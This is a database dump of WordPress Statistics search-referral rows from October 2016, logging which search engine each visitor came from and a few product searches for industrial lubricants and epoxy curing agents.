INSERT INTO `wp_statistics_search` VALUES (2613, '2016-10-24', 'google', 'www.google.com', '', 11052); 
INSERT INTO `wp_statistics_search` VALUES (2614, '2016-10-24', 'google', 'www.google.co.il', '', 11053); 
INSERT INTO `wp_statistics_search` VALUES (2615, '2016-10-24', 'google', 'www.google.com', '', 11054); 
INSERT INTO `wp_statistics_search` VALUES (2616, '2016-10-24', 'google', 'www.google.cl', '', 11058); 
INSERT INTO `wp_statistics_search` VALUES (2617, '2016-10-24', 'google', 'www.google.ca', '', 11059); 
INSERT INTO `wp_statistics_search` VALUES (2618, '2016-10-24', 'google', 'www.google.com', '', 11061); 
INSERT INTO `wp_statistics_search` VALUES (2619, '2016-10-24', 'google', 'www.google.ca', '', 11063); 
INSERT INTO `wp_statistics_search` VALUES (2620, '2016-10-24', 'google', 'www.google.com', '', 11065); 
INSERT INTO `wp_statistics_search` VALUES (2621, '2016-10-24', 'google', 'www.google.fr', '', 11070); 
INSERT INTO `wp_statistics_search` VALUES (2622, '2016-10-24', 'yahoo', 'r.search.yahoo.com', '', 11071); 
INSERT INTO `wp_statistics_search` VALUES (2623, '2016-10-24', 'google', 'www.google.com', '', 11073); 
INSERT INTO `wp_statistics_search` VALUES (2624, '2016-10-24', 'google', 'www.google.ca', '', 11077); 
INSERT INTO `wp_statistics_search` VALUES (2625, '2016-10-24', 'google', 'www.google.com', '', 11079); 
INSERT INTO `wp_statistics_search` VALUES (2626, '2016-10-24', 'yahoo', 'r.search.yahoo.com', '', 11081); 
INSERT INTO `wp_statistics_search` VALUES (2627, '2016-10-24', 'google', 'www.google.ca', '', 11082); 
INSERT INTO `wp_statistics_search` VALUES (2628, '2016-10-24', 'bing', 'www.bing.com', '', 11083); 
INSERT INTO `wp_statistics_search` VALUES (2629, '2016-10-24', 'yandex', 'yandex.ru', '', 11085); 
INSERT INTO `wp_statistics_search` VALUES (2630, '2016-10-24', 'google', 'www.google.com', 'dupont krytox lubricant', 11086); 
INSERT INTO `wp_statistics_search` VALUES (2631, '2016-10-24', 'google', 'www.google.com', '', 11091); 
INSERT INTO `wp_statistics_search` VALUES (2632, '2016-10-24', 'google', 'www.google.com', 'curing agent W', 11096); 
INSERT INTO `wp_statistics_search` VALUES (2633, '2016-10-24', 'google', 'www.google.com', '', 11109); 
INSERT INTO `wp_statistics_search` VALUES (2634, '2016-10-24', 'google', 'www.google.com', '', 11110); 
INSERT INTO `wp_statistics_search` VALUES (2635, '2016-10-24', 'google', 'www.google.co.uk', '', 11111); 
INSERT INTO `wp_statistics_search` VALUES (2636, '2016-10-24', 'google', 'www.google.com', '', 11114); 
INSERT INTO `wp_statistics_search` VALUES (2637, '2016-10-24', 'google', 'www.google.com', '', 11117); 
INSERT INTO `wp_statistics_search` VALUES (2638, '2016-10-24', 'bing', 'www.bing.com', '', 11120); 
INSERT INTO `wp_statistics_search` VALUES (2639, '2016-10-24', 'google', 'www.google.com', '', 11124); 
INSERT INTO `wp_statistics_search` VALUES (2640, '2016-10-24', 'google', 'www.google.com', '', 11130); 
INSERT INTO `wp_statistics_search` VALUES (2641, '2016-10-24', 'google', 'www.google.com', '', 11131); 
INSERT INTO `wp_statistics_search` VALUES (2642, '2016-10-24', 'google', 'www.google.com', '', 11132); 
INSERT INTO `wp_statistics_search` VALUES (2643, '2016-10-24', 'google', 'www.google.com', '', 11133); 
INSERT INTO `wp_statistics_search` VALUES (2644, '2016-10-24', 'google', 'www.google.com.au', '', 11145); 
INSERT INTO `wp_statistics_search` VALUES (2645, '2016-10-25', 'google', 'www.google.com', '', 11150); 
INSERT INTO `wp_statistics_search` VALUES (2646, '2016-10-25', 'google', 'www.google.com', '', 11170); 
INSERT INTO `wp_statistics_search` VALUES (2647, '2016-10-25', 'google', 'www.google.com', '', 11190); 
INSERT INTO `wp_statistics_search` VALUES (2648, '2016-10-25', 'google', 'www.google.com', '', 11195); 
INSERT INTO `wp_statistics_search` VALUES (2649, '2016-10-25', 'google', 'www.google.com', '', 11198); 
INSERT INTO `wp_statistics_search` VALUES (2650, '2016-10-25', 'google', 'www.google.com', '', 11201); 
INSERT INTO `wp_statistics_search` VALUES (2651, '2016-10-25', 'google', 'www.google.com', '', 11202); 
INSERT INTO `wp_statistics_search` VALUES (2652, '2016-10-25', 'google', 'www.google.com.hk', '', 11209); 
INSERT INTO `wp_statistics_search` VALUES (2653, '2016-10-25', 'google', 'www.google.com.au', '', 11212); 
INSERT INTO `wp_statistics_search` VALUES (2654, '2016-10-25', 'google', 'www.google.com', '', 11216); 
INSERT INTO `wp_statistics_search` VALUES (2655, '2016-10-25', 'google', 'www.google.com', '', 11220); 
INSERT INTO `wp_statistics_search` VALUES (2656, '2016-10-25', 'google', 'www.google.com', '', 11223); 
INSERT INTO `wp_statistics_search` VALUES (2657, '2016-10-25', 'google', 'www.google.co.nz', '', 11225); 
INSERT INTO `wp_statistics_search` VALUES (2658, '2016-10-25', 'google', 'www.google.com', '', 11227); 
INSERT INTO `wp_statistics_search` VALUES (2659, '2016-10-25', 'bing', 'cn.bing.com', 'Miller Stephenson', 11228); 
INSERT INTO `wp_statistics_search` VALUES (2660, '2016-10-25', 'google', 'www.google.com', '', 11229); 
INSERT INTO `wp_statistics_search` VALUES (2661, '2016-10-25', 'google', 'www.google.ru', '', 11239); 
INSERT INTO `wp_statistics_search` VALUES (2662, '2016-10-25', 'google', 'www.google.com', '', 11240); 
INSERT INTO `wp_statistics_search` VALUES (2663, '2016-10-25', 'google', 'www.google.com', 'what properties of polymers can be based on for measuring the molecular weight?', 11241); 
INSERT INTO `wp_statistics_search` VALUES (2664, '2016-10-25', 'google', 'www.google.com.au', '', 11246); 
INSERT INTO `wp_statistics_search` VALUES (2665, '2016-10-25', 'google', 'www.google.com', '', 11248); 
INSERT INTO `wp_statistics_search` VALUES (2666, '2016-10-25', 'google', 'www.google.com.au', '', 11258); 
INSERT INTO `wp_statistics_search` VALUES (2667, '2016-10-25', 'google', 'www.google.co.in', '', 11268); 
INSERT INTO `wp_statistics_search` VALUES (2668, '2016-10-25', 'google', 'www.google.co.in', '', 11269); 
INSERT INTO `wp_statistics_search` VALUES (2669, '2016-10-25', 'google', 'www.google.co.in', '', 11275); 
INSERT INTO `wp_statistics_search` VALUES (2670, '2016-10-25', 'google', 'www.google.co.il', '', 11276); 
INSERT INTO `wp_statistics_search` VALUES (2671, '2016-10-25', 'google', 'www.google.co.in', '', 11278); 
INSERT INTO `wp_statistics_search` VALUES (2672, '2016-10-25', 'bing', 'www.bing.com', '', 11280); 
INSERT INTO `wp_statistics_search` VALUES (2673, '2016-10-25', 'google', 'www.google.com', '', 11288); 
INSERT INTO `wp_statistics_search` VALUES (2674, '2016-10-25', 'google', 'www.google.co.jp', '', 11295); 
INSERT INTO `wp_statistics_search` VALUES (2675, '2016-10-25', 'google', 'www.google.nl', '', 11296); 
INSERT INTO `wp_statistics_search` VALUES (2676, '2016-10-25', 'google', 'www.google.co.kr', '', 11320); 
INSERT INTO `wp_statistics_search` VALUES (2677, '2016-10-25', 'google', 'www.google.co.kr', '', 11324); 
INSERT INTO `wp_statistics_search` VALUES (2678, '2016-10-25', 'google', 'www.google.co.uk', '', 11328); 
INSERT INTO `wp_statistics_search` VALUES (2679, '2016-10-25', 'google', 'www.google.co.za', '', 11330); 
INSERT INTO `wp_statistics_search` VALUES (2680, '2016-10-25', 'google', 'www.google.gr', '', 11332); 
INSERT INTO `wp_statistics_search` VALUES (2681, '2016-10-25', 'google', 'www.google.com', '', 11344); 
INSERT INTO `wp_statistics_search` VALUES (2682, '2016-10-25', 'google', 'www.google.com.vn', '', 11349); 
INSERT INTO `wp_statistics_search` VALUES (2683, '2016-10-25', 'google', 'www.google.it', '', 11377); 
INSERT INTO `wp_statistics_search` VALUES (2684, '2016-10-25', 'google', 'www.google.at', '', 11395); 
INSERT INTO `wp_statistics_search` VALUES (2685, '2016-10-25', 'google', 'www.google.it', '', 11397); 
INSERT INTO `wp_statistics_search` VALUES (2686, '2016-10-25', 'google', 'www.google.com', '', 11401); 
INSERT INTO `wp_statistics_search` VALUES (2687, '2016-10-25', 'google', 'www.google.com', '', 11410); 
INSERT INTO `wp_statistics_search` VALUES (2688, '2016-10-25', 'google', 'www.google.com.tr', '', 11412); 
INSERT INTO `wp_statistics_search` VALUES (2689, '2016-10-25', 'google', 'www.google.de', '', 11420); 
INSERT INTO `wp_statistics_search` VALUES (2690, '2016-10-25', 'google', 'www.google.ca', '', 11423); 
INSERT INTO `wp_statistics_search` VALUES (2691, '2016-10-25', 'google', 'www.google.com', '', 11424); 
INSERT INTO `wp_statistics_search` VALUES (2692, '2016-10-25', 'google', 'www.google.ca', '', 11434); 
INSERT INTO `wp_statistics_search` VALUES (2693, '2016-10-25', 'google', 'www.google.ca', '', 11438); 
INSERT INTO `wp_statistics_search` VALUES (2694, '2016-10-25', 'google', 'www.google.com', '', 11440); 
INSERT INTO `wp_statistics_search` VALUES (2695, '2016-10-25', 'google', 'www.google.com', '', 11441); 
INSERT INTO `wp_statistics_search` VALUES (2696, '2016-10-25', 'google', 'www.google.com', '', 11452); 
INSERT INTO `wp_statistics_search` VALUES (2697, '2016-10-25', 'google', 'www.google.com', '', 11454); 
INSERT INTO `wp_statistics_search` VALUES (2698, '2016-10-25', 'bing', 'www.bing.com', '', 11457); 
INSERT INTO `wp_statistics_search` VALUES (2699, '2016-10-25', 'yahoo', 'r.search.yahoo.com', '', 11460); 
INSERT INTO `wp_statistics_search` VALUES (2700, '2016-10-25', 'google', 'www.google.ca', '', 11463); 
INSERT INTO `wp_statistics_search` VALUES (2701, '2016-10-25', 'google', 'www.google.com', '', 11465); 
INSERT INTO `wp_statistics_search` VALUES (2702, '2016-10-25', 'google', 'www.google.com', '', 11482); 
INSERT INTO `wp_statistics_search` VALUES (2703, '2016-10-25', 'google', 'www.google.com', '', 11487); 
INSERT INTO `wp_statistics_search` VALUES (2704, '2016-10-25', 'google', 'www.google.com', 'high temp lubricant spray', 11489); 
INSERT INTO `wp_statistics_search` VALUES (2705, '2016-10-25', 'google', 'www.google.com', '', 11490); 
INSERT INTO `wp_statistics_search` VALUES (2706, '2016-10-25', 'google', 'www.google.com', '', 11500); 
INSERT INTO `wp_statistics_search` VALUES (2707, '2016-10-25', 'google', 'www.google.com', '', 11501); 
INSERT INTO `wp_statistics_search` VALUES (2708, '2016-10-25', 'google', 'www.google.com', '', 11502); 
INSERT INTO `wp_statistics_search` VALUES (2709, '2016-10-25', 'bing', 'www.bing.com', '', 11503); 
INSERT INTO `wp_statistics_search` VALUES (2710, '2016-10-25', 'google', 'www.google.com', '', 11508); 
INSERT INTO `wp_statistics_search` VALUES (2711, '2016-10-25', 'google', 'www.google.com.do', '', 11515); 
INSERT INTO `wp_statistics_search` VALUES (2712, '2016-10-25', 'google', 'www.google.com', '', 11519); 
INSERT INTO `wp_statistics_search` VALUES (2713, '2016-10-25', 'google', 'www.google.com', '', 11521); 
INSERT INTO `wp_statistics_search` VALUES (2714, '2016-10-25', 'google', 'www.google.com', '', 11525); 
INSERT INTO `wp_statistics_search` VALUES (2715, '2016-10-25', 'google', 'www.google.com', '', 11528); 
INSERT INTO `wp_statistics_search` VALUES (2716, '2016-10-25', 'bing', 'www.bing.com', 'epon 815c', 11530); 
INSERT INTO `wp_statistics_search` VALUES (2717, '2016-10-25', 'google', 'www.google.com', '', 11536); 
INSERT INTO `wp_statistics_search` VALUES (2718, '2016-10-25', 'google', 'www.google.com', '', 11537); 
INSERT INTO `wp_statistics_search` VALUES (2719, '2016-10-25', 'google', 'www.google.co.in', '', 11538); 
INSERT INTO `wp_statistics_search` VALUES (2720, '2016-10-25', 'google', 'www.google.com', '', 11548); 
INSERT INTO `wp_statistics_search` VALUES (2721, '2016-10-25', 'bing', 'www.bing.com', 'miller stephenson ms-460c', 11553); 
INSERT INTO `wp_statistics_search` VALUES (2722, '2016-10-25', 'google', 'www.google.co.uk', '', 11563); 
INSERT INTO `wp_statistics_search` VALUES (2723, '2016-10-25', 'google', 'www.google.de', '', 11564); 
INSERT INTO `wp_statistics_search` VALUES (2724, '2016-10-25', 'google', 'www.google.com', '', 11566); 
INSERT INTO `wp_statistics_search` VALUES (2725, '2016-10-25', 'google', 'www.google.com.sg', '', 11567); 
INSERT INTO `wp_statistics_search` VALUES (2726, '2016-10-25', 'google', 'www.google.com', '', 11572); 
INSERT INTO `wp_statistics_search` VALUES (2727, '2016-10-25', 'google', 'www.google.com', '', 11573); 
INSERT INTO `wp_statistics_search` VALUES (2728, '2016-10-25', 'google', 'www.google.com', '', 11582); 
INSERT INTO `wp_statistics_search` VALUES (2729, '2016-10-25', 'google', 'www.google.com', '', 11583); 
INSERT INTO `wp_statistics_search` VALUES (2730, '2016-10-25', 'bing', 'www.bing.com', '', 11586); 
INSERT INTO `wp_statistics_search` VALUES (2731, '2016-10-25', 'google', 'www.google.com', '', 11591); 
INSERT INTO `wp_statistics_search` VALUES (2732, '2016-10-25', 'google', 'www.google.com', '', 11596); 
INSERT INTO `wp_statistics_search` VALUES (2733, '2016-10-25', 'google', 'www.google.com', '', 11597); 
INSERT INTO `wp_statistics_search` VALUES (2734, '2016-10-25', 'google', 'www.google.com', '', 11600); 
INSERT INTO `wp_statistics_search` VALUES (2735, '2016-10-25', 'google', 'www.google.com', '', 11603); 
INSERT INTO `wp_statistics_search` VALUES (2736, '2016-10-25', 'google', 'www.google.com', '', 11606); 
INSERT INTO `wp_statistics_search` VALUES (2737, '2016-10-25', 'google', 'www.google.co.in', '', 11607); 
INSERT INTO `wp_statistics_search` VALUES (2738, '2016-10-25', 'google', 'www.google.com', 'what properties of polymers can be based on for measuring the molecular weight?', 11610); 
INSERT INTO `wp_statistics_search` VALUES (2739, '2016-10-25', 'google', 'www.google.com', '', 11611); 
INSERT INTO `wp_statistics_search` VALUES (2740, '2016-10-25', 'google', 'www.google.com', '', 11613); 
INSERT INTO `wp_statistics_search` VALUES (2741, '2016-10-25', 'bing', 'www.bing.com', 'miller stephenson', 11614); 
INSERT INTO `wp_statistics_search` VALUES (2742, '2016-10-25', 'bing', 'www.bing.com', 'miller stephenson chemical co inc', 11618); 
INSERT INTO `wp_statistics_search` VALUES (2743, '2016-10-25', 'google', 'www.google.az', '', 11623); 
INSERT INTO `wp_statistics_search` VALUES (2744, '2016-10-25', 'google', 'www.google.com', '', 11624); 
INSERT INTO `wp_statistics_search` VALUES (2745, '2016-10-25', 'google', 'www.google.com', '', 11626); 
INSERT INTO `wp_statistics_search` VALUES (2746, '2016-10-25', 'google', 'www.google.com', '', 11627); 
INSERT INTO `wp_statistics_search` VALUES (2747, '2016-10-25', 'google', 'www.google.com', '', 11628); 
INSERT INTO `wp_statistics_search` VALUES (2748, '2016-10-25', 'google', 'www.google.com', '', 11636); 
INSERT INTO `wp_statistics_search` VALUES (2749, '2016-10-25', 'google', 'www.google.com', '', 11641); 
INSERT INTO `wp_statistics_search` VALUES (2750, '2016-10-25', 'google', 'www.google.com', '', 11644); 
INSERT INTO `wp_statistics_search` VALUES (2751, '2016-10-25', 'google', 'www.google.com', '', 11645); 
INSERT INTO `wp_statistics_search` VALUES (2752, '2016-10-25', 'google', 'www.google.com', '', 11646); 
INSERT INTO `wp_statistics_search` VALUES (2753, '2016-10-25', 'google', 'www.google.es', '', 11647); 
INSERT INTO `wp_statistics_search` VALUES (2754, '2016-10-25', 'google', 'www.google.com', '', 11651); 
INSERT INTO `wp_statistics_search` VALUES (2755, '2016-10-25', 'google', 'www.google.com', '', 11654); 
INSERT INTO `wp_statistics_search` VALUES (2756, '2016-10-25', 'google', 'www.google.com', '', 11660); 
INSERT INTO `wp_statistics_search` VALUES (2757, '2016-10-25', 'google', 'www.google.com', '', 11662); 
INSERT INTO `wp_statistics_search` VALUES (2758, '2016-10-25', 'google', 'www.google.com', '', 11670); 
INSERT INTO `wp_statistics_search` VALUES (2759, '2016-10-25', 'google', 'www.google.cl', '', 11675); 
INSERT INTO `wp_statistics_search` VALUES (2760, '2016-10-25', 'google', 'www.google.com', '', 11677); 
INSERT INTO `wp_statistics_search` VALUES (2761, '2016-10-25', 'google', 'www.google.com', '', 11679); 
INSERT INTO `wp_statistics_search` VALUES (2762, '2016-10-25', 'google', 'www.google.com', '', 11680); 
INSERT INTO `wp_statistics_search` VALUES (2763, '2016-10-25', 'google', 'www.google.com', '', 11681); 
INSERT INTO `wp_statistics_search` VALUES (2764, '2016-10-25', 'google', 'www.google.com', '', 11683); 
INSERT INTO `wp_statistics_search` VALUES (2765, '2016-10-25', 'google', 'www.google.com', '', 11686); 
INSERT INTO `wp_statistics_search` VALUES (2766, '2016-10-25', 'google', 'www.google.com', '', 11687); 
INSERT INTO `wp_statistics_search` VALUES (2767, '2016-10-25', 'google', 'www.google.com', '', 11689); 
INSERT INTO `wp_statistics_search` VALUES (2768, '2016-10-25', 'google', 'www.google.com', '', 11695); 
INSERT INTO `wp_statistics_search` VALUES (2769, '2016-10-25', 'google', 'www.google.com', '', 11698); 
INSERT INTO `wp_statistics_search` VALUES (2770, '2016-10-25', 'google', 'www.google.com', '', 11703); 
INSERT INTO `wp_statistics_search` VALUES (2771, '2016-10-25', 'google', 'www.google.com', '', 11704); 
INSERT INTO `wp_statistics_search` VALUES (2772, '2016-10-25', 'google', 'www.google.ca', '', 11707); 
INSERT INTO `wp_statistics_search` VALUES (2773, '2016-10-25', 'google', 'www.google.com', '', 11709); 
INSERT INTO `wp_statistics_search` VALUES (2774, '2016-10-25', 'google', 'www.google.com', '', 11710); 
INSERT INTO `wp_statistics_search` VALUES (2775, '2016-10-25', 'google', 'www.google.com.mx', '', 11712); 
INSERT INTO `wp_statistics_search` VALUES (2776, '2016-10-25', 'google', 'www.google.com', '', 11714); 
INSERT INTO `wp_statistics_search` VALUES (2777, '2016-10-25', 'google', 'www.google.com', '', 11716); 
INSERT INTO `wp_statistics_search` VALUES (2778, '2016-10-25', 'google', 'www.google.ca', '', 11718); 
INSERT INTO `wp_statistics_search` VALUES (2779, '2016-10-25', 'google', 'www.google.com', '', 11721); 
INSERT INTO `wp_statistics_search` VALUES (2780, '2016-10-25', 'google', 'www.google.com', '', 11728); 
INSERT INTO `wp_statistics_search` VALUES (2781, '2016-10-25', 'google', 'www.google.com', '', 11729); 
INSERT INTO `wp_statistics_search` VALUES (2782, '2016-10-25', 'google', 'www.google.com', '', 11731); 
INSERT INTO `wp_statistics_search` VALUES (2783, '2016-10-25', 'google', 'www.google.com', '', 11733); 
INSERT INTO `wp_statistics_search` VALUES (2784, '2016-10-25', 'google', 'www.google.com.pe', '', 11734); 
INSERT INTO `wp_statistics_search` VALUES (2785, '2016-10-25', 'google', 'www.google.com', '', 11735); 
INSERT INTO `wp_statistics_search` VALUES (2786, '2016-10-25', 'google', 'www.google.com', '', 11739); 
INSERT INTO `wp_statistics_search` VALUES (2787, '2016-10-25', 'google', 'www.google.com', '', 11740); 
INSERT INTO `wp_statistics_search` VALUES (2788, '2016-10-25', 'google', 'www.google.com', '', 11742); 
INSERT INTO `wp_statistics_search` VALUES (2789, '2016-10-25', 'yahoo', 'search.yahoo.com', '', 11743); 
INSERT INTO `wp_statistics_search` VALUES (2790, '2016-10-25', 'google', 'www.google.com', '', 11747); 
INSERT INTO `wp_statistics_search` VALUES (2791, '2016-10-25', 'google', 'www.google.com', '', 11752); 
INSERT INTO `wp_statistics_search` VALUES (2792, '2016-10-25', 'google', 'www.google.com', 'slick em food grade lubricant', 11753); 
INSERT INTO `wp_statistics_search` VALUES (2793, '2016-10-25', 'google', 'www.google.dk', '', 11761); 
INSERT INTO `wp_statistics_search` VALUES (2794, '2016-10-25', 'bing', 'www.bing.com', 'EPIKURE 3140 Polyamide Curing Agent', 11762); 
INSERT INTO `wp_statistics_search` VALUES (2795, '2016-10-25', 'google', 'www.google.com', '', 11763); 
INSERT INTO `wp_statistics_search` VALUES (2796, '2016-10-25', 'google', 'www.google.com', '', 11767); 
INSERT INTO `wp_statistics_search` VALUES (2797, '2016-10-25', 'google', 'www.google.com', '', 11771); 
INSERT INTO `wp_statistics_search` VALUES (2798, '2016-10-25', 'google', 'www.google.com', '', 11778); 
INSERT INTO `wp_statistics_search` VALUES (2799, '2016-10-25', 'google', 'www.google.ca', '', 11779); 
INSERT INTO `wp_statistics_search` VALUES (2800, '2016-10-25', 'google', 'www.google.com', '', 11781); 
INSERT INTO `wp_statistics_search` VALUES (2801, '2016-10-25', 'google', 'www.google.de', '', 11783); 
INSERT INTO `wp_statistics_search` VALUES (2802, '2016-10-25', 'google', 'www.google.com', '', 11784); 
INSERT INTO `wp_statistics_search` VALUES (2803, '2016-10-25', 'google', 'www.google.com', '', 11785); 
INSERT INTO `wp_statistics_search` VALUES (2804, '2016-10-26', 'google', 'www.google.co.kr', '', 11806); 
INSERT INTO `wp_statistics_search` VALUES (2805, '2016-10-26', 'google', 'www.google.com', '', 11815); 
INSERT INTO `wp_statistics_search` VALUES (2806, '2016-10-26', 'google', 'www.google.com', '', 11820); 
INSERT INTO `wp_statistics_search` VALUES (2807, '2016-10-26', 'google', 'www.google.com', '', 11822); 
INSERT INTO `wp_statistics_search` VALUES (2808, '2016-10-26', 'google', 'www.google.com', '', 11824); 
INSERT INTO `wp_statistics_search` VALUES (2809, '2016-10-26', 'google', 'www.google.com', '', 11838); 
INSERT INTO `wp_statistics_search` VALUES (2810, '2016-10-26', 'google', 'www.google.com', '', 11843); 
INSERT INTO `wp_statistics_search` VALUES (2811, '2016-10-26', 'google', 'www.google.com', '', 11846); 
INSERT INTO `wp_statistics_search` VALUES (2812, '2016-10-26', 'google', 'www.google.com', '', 11850); 
INSERT INTO `wp_statistics_search` VALUES (2813, '2016-10-26', 'google', 'www.google.com.au', '', 11851); 
INSERT INTO `wp_statistics_search` VALUES (2814, '2016-10-26', 'google', 'www.google.co.kr', '', 11860); 
INSERT INTO `wp_statistics_search` VALUES (2815, '2016-10-26', 'google', 'www.google.com', '', 11861); 
INSERT INTO `wp_statistics_search` VALUES (2816, '2016-10-26', 'google', 'www.google.co.kr', '', 11863); 
INSERT INTO `wp_statistics_search` VALUES (2817, '2016-10-26', 'google', 'www.google.co.kr', '', 11868); 
INSERT INTO `wp_statistics_search` VALUES (2818, '2016-10-26', 'google', 'www.google.co.jp', '', 11869); 
INSERT INTO `wp_statistics_search` VALUES (2819, '2016-10-26', 'google', 'www.google.it', '', 11883); 
INSERT INTO `wp_statistics_search` VALUES (2820, '2016-10-26', 'google', 'www.google.co.th', '', 11885); 
INSERT INTO `wp_statistics_search` VALUES (2821, '2016-10-26', 'google', 'www.google.com', '', 11909); 
INSERT INTO `wp_statistics_search` VALUES (2822, '2016-10-26', 'google', 'www.google.co.uk', '', 11958); 
INSERT INTO `wp_statistics_search` VALUES (2823, '2016-10-26', 'google', 'www.google.co.il', '', 11980); 
INSERT INTO `wp_statistics_search` VALUES (2824, '2016-10-26', 'google', 'www.google.co.kr', '', 11981); 
INSERT INTO `wp_statistics_search` VALUES (2825, '2016-10-26', 'google', 'www.google.ru', '', 11986); 
INSERT INTO `wp_statistics_search` VALUES (2826, '2016-10-26', 'google', 'www.google.fr', '', 11996); 
INSERT INTO `wp_statistics_search` VALUES (2827, '2016-10-26', 'google', 'www.google.cz', '', 12004); 
INSERT INTO `wp_statistics_search` VALUES (2828, '2016-10-26', 'google', 'www.google.co.uk', '', 12011); 
INSERT INTO `wp_statistics_search` VALUES (2829, '2016-10-26', 'google', 'www.google.de', '', 12024); 
INSERT INTO `wp_statistics_search` VALUES (2830, '2016-10-26', 'google', 'www.google.pl', '', 12025); 
INSERT INTO `wp_statistics_search` VALUES (2831, '2016-10-26', 'google', 'www.google.co.uk', '', 12038); 
INSERT INTO `wp_statistics_search` VALUES (2832, '2016-10-26', 'google', 'www.google.co.in', '', 12042); 
INSERT INTO `wp_statistics_search` VALUES (2833, '2016-10-26', 'google', 'www.google.com.pk', '', 12049); 
INSERT INTO `wp_statistics_search` VALUES (2834, '2016-10-26', 'bing', 'www.bing.com', 'ms-122ra', 12075); 
INSERT INTO `wp_statistics_search` VALUES (2835, '2016-10-26', 'google', 'www.google.com', '', 12078); 
INSERT INTO `wp_statistics_search` VALUES (2836, '2016-10-26', 'google', 'www.google.com', '', 12081); 
INSERT INTO `wp_statistics_search` VALUES (2837, '2016-10-26', 'google', 'www.google.co.il', '', 12086); 
INSERT INTO `wp_statistics_search` VALUES (2838, '2016-10-26', 'google', 'www.google.com.br', '', 12095); 
INSERT INTO `wp_statistics_search` VALUES (2839, '2016-10-26', 'google', 'www.google.com', '', 12096); 
INSERT INTO `wp_statistics_search` VALUES (2840, '2016-10-26', 'google', 'www.google.co.th', '', 12099); 
INSERT INTO `wp_statistics_search` VALUES (2841, '2016-10-26', 'google', 'www.google.com', '', 12102); 
INSERT INTO `wp_statistics_search` VALUES (2842, '2016-10-26', 'google', 'www.google.com', '', 12107); 
INSERT INTO `wp_statistics_search` VALUES (2843, '2016-10-26', 'google', 'www.google.com', '', 12108); 
INSERT INTO `wp_statistics_search` VALUES (2844, '2016-10-26', 'google', 'www.google.ca', '', 12114); 
INSERT INTO `wp_statistics_search` VALUES (2845, '2016-10-26', 'google', 'www.google.com', '', 12115); 
INSERT INTO `wp_statistics_search` VALUES (2846, '2016-10-26', 'google', 'www.google.com', '', 12117); 
INSERT INTO `wp_statistics_search` VALUES (2847, '2016-10-26', 'google', 'www.google.co.za', '', 12126); 
INSERT INTO `wp_statistics_search` VALUES (2848, '2016-10-26', 'bing', 'www.bing.com', 'miller stephenson EPIKURE3223', 12131); 
INSERT INTO `wp_statistics_search` VALUES (2849, '2016-10-26', 'google', 'www.google.com', '', 12132); 
INSERT INTO `wp_statistics_search` VALUES (2850, '2016-10-26', 'google', 'www.google.com', '', 12140); 
INSERT INTO `wp_statistics_search` VALUES (2851, '2016-10-26', 'google', 'www.google.com', '', 12142); 
INSERT INTO `wp_statistics_search` VALUES (2852, '2016-10-26', 'google', 'www.google.com', '', 12145); 
INSERT INTO `wp_statistics_search` VALUES (2853, '2016-10-26', 'google', 'www.google.ca', '', 12146); 
INSERT INTO `wp_statistics_search` VALUES (2854, '2016-10-26', 'google', 'www.google.com', '', 12148); 
INSERT INTO `wp_statistics_search` VALUES (2855, '2016-10-26', 'google', 'www.google.co.uk', '', 12158); 
INSERT INTO `wp_statistics_search` VALUES (2856, '2016-10-26', 'google', 'www.google.pl', '', 12159); 
INSERT INTO `wp_statistics_search` VALUES (2857, '2016-10-26', 'google', 'plus.url.google.com', '', 12161); 
INSERT INTO `wp_statistics_search` VALUES (2858, '2016-10-26', 'google', 'www.google.com', '', 12171); 
INSERT INTO `wp_statistics_search` VALUES (2859, '2016-10-26', 'google', 'www.google.co.th', '', 12172); 
INSERT INTO `wp_statistics_search` VALUES (2860, '2016-10-26', 'google', 'www.google.de', '', 12180); 
INSERT INTO `wp_statistics_search` VALUES (2861, '2016-10-26', 'google', 'www.google.co.uk', '', 12181); 
INSERT INTO `wp_statistics_search` VALUES (2862, '2016-10-26', 'google', 'www.google.com', '', 12185); 
INSERT INTO `wp_statistics_search` VALUES (2863, '2016-10-26', 'google', 'www.google.com.tr', '', 12186); 
INSERT INTO `wp_statistics_search` VALUES (2864, '2016-10-26', 'google', 'www.google.com', '', 12194); 
INSERT INTO `wp_statistics_search` VALUES (2865, '2016-10-26', 'google', 'www.google.com', '', 12197); 
INSERT INTO `wp_statistics_search` VALUES (2866, '2016-10-26', 'google', 'www.google.ca', '', 12198); 
INSERT INTO `wp_statistics_search` VALUES (2867, '2016-10-26', 'google', 'www.google.com', '', 12200); 
INSERT INTO `wp_statistics_search` VALUES (2868, '2016-10-26', 'google', 'www.google.com', '', 12203); 
INSERT INTO `wp_statistics_search` VALUES (2869, '2016-10-26', 'google', 'www.google.com', '', 12207); 
INSERT INTO `wp_statistics_search` VALUES (2870, '2016-10-26', 'google', 'www.google.com', '', 12213); 
INSERT INTO `wp_statistics_search` VALUES (2871, '2016-10-26', 'bing', 'www.bing.com', 'miller-stephenson sds', 12217); 
INSERT INTO `wp_statistics_search` VALUES (2872, '2016-10-26', 'google', 'www.google.com', '', 12220); 
INSERT INTO `wp_statistics_search` VALUES (2873, '2016-10-26', 'google', 'www.google.com', '', 12225); 
INSERT INTO `wp_statistics_search` VALUES (2874, '2016-10-26', 'google', 'www.google.com', '', 12233); 
INSERT INTO `wp_statistics_search` VALUES (2875, '2016-10-26', 'google', 'www.google.com', '', 12236); 
INSERT INTO `wp_statistics_search` VALUES (2876, '2016-10-26', 'google', 'www.google.com', '', 12238); 
INSERT INTO `wp_statistics_search` VALUES (2877, '2016-10-26', 'bing', 'www.bing.com', '', 12240); 
INSERT INTO `wp_statistics_search` VALUES (2878, '2016-10-26', 'google', 'www.google.com', '', 12243); 
INSERT INTO `wp_statistics_search` VALUES (2879, '2016-10-26', 'google', 'www.google.com', '', 12246); 
INSERT INTO `wp_statistics_search` VALUES (2880, '2016-10-26', 'google', 'www.google.com', '', 12247); 
INSERT INTO `wp_statistics_search` VALUES (2881, '2016-10-26', 'google', 'www.google.com', '', 12248); 
INSERT INTO `wp_statistics_search` VALUES (2882, '2016-10-26', 'google', 'www.google.com', '', 12250); 
INSERT INTO `wp_statistics_search` VALUES (2883, '2016-10-26', 'google', 'www.google.com', '', 12253); 
INSERT INTO `wp_statistics_search` VALUES (2884, '2016-10-26', 'google', 'www.google.com', '', 12257); 
INSERT INTO `wp_statistics_search` VALUES (2885, '2016-10-26', 'google', 'www.google.com', '', 12260); 
INSERT INTO `wp_statistics_search` VALUES (2886, '2016-10-26', 'google', 'www.google.com', '', 12262); 
INSERT INTO `wp_statistics_search` VALUES (2887, '2016-10-26', 'bing', 'www.bing.com', 'Epon 862', 12267); 
